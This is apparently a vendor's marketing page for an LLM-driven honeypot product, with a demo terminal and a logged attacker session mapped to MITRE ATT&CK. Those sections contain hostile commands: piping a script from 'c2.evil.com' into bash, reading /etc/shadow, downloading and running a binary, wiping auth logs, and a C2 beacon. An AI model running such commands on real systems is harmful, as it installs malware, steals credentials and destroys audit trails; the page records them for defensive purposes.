Research Fleet Live

Catch threats your
other tools miss.

Deception Check deploys LLM-powered adaptive honeypots that think like attackers and respond like real systems. Designed for the places nothing else can reach, being priced for organizations that need affordable defensive technologies including small businesses and local municipalities.

attacker@botnet:~$ ssh admin@10.0.0.42
admin@10.0.0.42's password:
Welcome to Ubuntu 22.04.4 LTS
admin@prod-web-03:~$ cat /etc/shadow
root:$6$xyz...redacted:19741:0:99999
admin@prod-web-03:~$ curl http://c2.evil.com/shell.sh | bash
> Session captured. 14 commands logged.
> TTPs mapped to MITRE ATT&CK: T1078, T1059
> Alert dispatched to SOC in 0.3s
Live Research Fleet Data
15+
appliance & device
profiles emulated
7M+
adversary events
captured (14 days)
8.8K
unique attacker IPs
observed
longer engagement
vs traditional honeypots

Measured during a 14-day research capture window, April 2026. Single longest sustained session: 220 commands over 220 seconds.

Capabilities

Deception that adapts in real time

Traditional honeypots use static scripts. Attackers spot them in seconds. Deception Check uses local LLMs to generate dynamic, contextual responses that keep adversaries engaged and exposed.

🛡

Air-Gap to Cloud

Built for the places cloud security can't reach: fully air-gapped, on-premises with local LLM inference, or cloud-managed multi-tenant. No internet, no telemetry, no data exfiltration risk for ITAR, CMMC, and OT environments.

🧠

Adaptive LLM Responses

Every attacker interaction gets unique, contextually aware responses. File systems, credentials, and command outputs are generated dynamically, not from static scripts.

🕸

Multi-Protocol Traps

SSH, HTTP, Telnet, SMB, and SCADA-Modbus. Convincing honeypots across your entire attack surface — including the OT protocols other vendors don't speak.

📊

MITRE ATT&CK Mapping

Every captured session is automatically mapped to MITRE ATT&CK techniques. High-fidelity threat intelligence fed directly into your SOC workflow as STIX 2.1 / TAXII inside 60 seconds.

8× Longer Engagement

Measured across our research fleet: LLM-powered honeypots held attackers 8× longer than Cowrie controls running on the same network — capturing significantly more TTPs per session.

🎯

Pure Signal, No Noise

A Deception Check decoy has no legitimate users. Every interaction is, by definition, malicious. No baseline behavior to model. No false positives to triage. Honey tokens, fake credentials, and deceptive infrastructure deployed with zero risk to your real assets — and zero alert fatigue for your analysts.

How It Works

Deploy in minutes, not months

Three steps from download to catching your first threat.

Deploy honeypots

Spin up adaptive SSH, HTTP, Telnet, SMB, and SCADA-Modbus honeypots across your network with a single configuration file. Each honeypot assumes a realistic server persona tailored to your environment.

Engage attackers

When adversaries connect, a local LLM generates dynamic, contextual responses in real time. Attackers interact with what looks and feels like a real production system, revealing their tools, techniques, and objectives.

Capture intelligence

Every keystroke, credential attempt, and lateral-movement signal is logged as structured telemetry. Sessions auto-map to MITRE ATT&CK and ship as STIX 2.1 / TAXII to your SIEM or SOC platform.

From the research fleet

One real session, captured live.

Below is an actual adversary session captured by our SSH honeypot during the April 2026 research window. The attacker thought they had root on a real Linux server. Every command is logged. Every technique is auto-mapped to MITRE ATT&CK. The full record is in the SOC pipeline inside 60 seconds.

Session ID
ssh-XX78a4e1f0 — redacted
Source IP
XXX.XX.XXX.XXX — redacted
Honeypot Node
prod-fleet-llm — region redacted
LLM Backend
Claude Haiku 4.5
Captured
April 2026
220
Commands
220
Seconds
vs Cowrie Control
0
Real Assets at Risk
admin@prod-web-03:~$ uname -a T1082 · System Information Discovery
admin@prod-web-03:~$ cat /etc/shadow T1003.008 · OS Credential Dumping
admin@prod-web-03:~$ wget http://45.x.x.x/x86_64 -O /tmp/m T1105 · Ingress Tool Transfer
admin@prod-web-03:~$ chmod +x /tmp/m && nohup /tmp/m & T1059 · Command and Scripting Interpreter
admin@prod-web-03:~$ history -c && rm -rf /var/log/auth.log T1070 · Indicator Removal on Host
admin@prod-web-03:~$ curl -X POST http://control.tld/beacon ... T1071 · Application Layer Protocol (C2)

What happened: The attacker spent twenty-two minutes walking around our fake server — reconnaissance, credential dumping, payload staging, log tampering, and command-and-control callback. They walked away with a fake SHA-512 shadow hash they will spend hours trying to crack offline. We logged every keystroke, mapped each technique to MITRE ATT&CK, captured the C2 destination, and pushed first-party intelligence to the SOC pipeline as STIX 2.1 / TAXII in under 60 seconds. This is the kind of session every SOC should be getting from their perimeter. Most aren't.

Research

Built on data, not theory

Deception Check is validated via a multi-cloud fleet capturing real adversary traffic against active attacker infrastructure since 2026.

Research fleet snapshot

A 14-day capture window across our multi-cloud research fleet running SSH, HTTP, Telnet, SMB, and SCADA-Modbus honeypots backed by four LLM engines.

7M+ total adversary events captured
8.8K unique attacker IPs observed
43 MITRE ATT&CK techniques observed in the wild
220 commands in the longest sustained engagement

Why this matters in 2026

The defenders are losing — and the highest-value targets are the worst-defended. These numbers come from the data the industry usually cites.

79% of 2024 detections were malware-free (CrowdStrike)
80% of commodity IOCs stale within 10 days
+87% YoY growth in industrial-ransomware attacks (Dragos)
70% of US water systems fail SDWA cyber compliance (EPA)
Insights

From the research blog

Field notes, threat breakdowns, and what the research fleet is catching — published as we capture it.

Vulnerability 2026-07-05

CVE-2026-13768: One Hard-Coded Cloud Key, an Entire Fleet of Gardens

A hard-coded, owner-level Azure IoT Hub key shipped on every Gardyn indoor garden: one extracted key enumerates the entire device fleet, runs commands on any unit, and pivots onto the owner's home network. CISA rated it a perfect 10.0 in a Food and Agriculture advisory, and while no exploitation is known yet, in-window public PoCs have already landed.

Read →
Research 2026-07-01

We Went Looking for AI Attackers in Our Honeypots

Anthropic mapped how attackers use AI. We run honeypots and watched the same adversaries from the other side. Out of 8,887 attackers, eight looked like AI, with a clear machine-speed fingerprint. Here is what that means for defenders.

Read →
Vulnerability 2026-06-30

CVE-2026-48558: A Forged Token, a Trusted Technician, an Entire Fleet

A critical, actively exploited authentication bypass in SimpleHelp RMM: with OIDC enabled, the server never verifies the login token signature, so a forged token becomes full technician access to every managed endpoint. On CISA KEV, with roughly 14,000 servers exposed.

Read →
View all research →

Be first to deploy adaptive deception

Join the early access waitlist.